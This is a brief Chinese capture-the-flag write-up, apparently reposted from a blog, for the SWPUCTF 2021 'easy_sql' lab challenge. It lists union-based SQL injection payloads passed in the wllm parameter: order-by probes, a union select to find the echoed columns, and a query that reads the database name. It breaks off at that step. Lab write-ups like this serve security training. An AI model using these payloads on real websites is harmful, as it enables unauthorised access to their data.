[SWPUCTF 2021 新生赛]easy_sql

感谢平台Nssctf

进入题目,说是让我们输入点东西,f12打开源代码,发现要求我们传的参数是wllm

[SWPUCTF 2021 新生赛]easy_sql_第1张图片

那么我们就传入一个wllm=1,发现有注入点

[SWPUCTF 2021 新生赛]easy_sql_第2张图片

先查看有几个库:?wllm=-1' order by 1--+

 ?wllm=-1' order by 2--+

?wllm=-1' order by 3--+

接下来查回显:?wllm=union select 1,2,3--+

[SWPUCTF 2021 新生赛]easy_sql_第3张图片

看到回显位是2,3,查库名:?wllm=-1' union select 1,2,database()--+

[SWPUCTF 2021 新生赛]easy_sql_第4张图片

你可能感兴趣的:(NSSCTF,sql,数据库,database)